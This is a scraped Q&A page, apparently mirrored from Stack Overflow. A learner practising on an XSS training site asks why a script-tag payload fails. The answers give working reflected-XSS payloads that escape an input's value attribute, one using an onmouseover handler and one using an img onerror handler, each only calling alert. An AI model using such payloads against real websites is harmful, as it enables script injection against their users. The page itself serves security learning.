stackoom
  简体   繁体   中英

Bug bounty XSS vulnerability website payload

 原文  2021-12-07 11:46:21       security/ xss/ payload

Question

I recently started to teach myself XSS vulnerability and stumbled this website for practice.

https://sudo.co.il/xss/level2.php

But after several attempts to enter several payloads

Example: <script>alert('XSS')</script>

I can't get XSS to work.

2 answers

solution1
 2  2021-12-07 17:43:01

The value is reflected in the input value attribute. You can escape this by starting with a " and then add other attributes. For example: " onmouseover="alert('XSS')" .

To require less user interaction you can change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px" or there may be better attributes to use instead.

solution2
 0  2022-06-19 19:05:44

You can escape this by starting with a "

For example: "><img/src=x onerror=alert(origin)>

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question XSS vulnerability: <wslite> XSS vulnerability locator Apparent jsonp xss vulnerability CSRF token and XSS vulnerability XSS vulnerability stuck xss payload not executing in browser NSURL POST with XSS vulnerability for iOS Struts2 Freemarker XSS Vulnerability Symfony2 vulnerability to XSS Attacks Exploit the xss vulnerability with php code
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM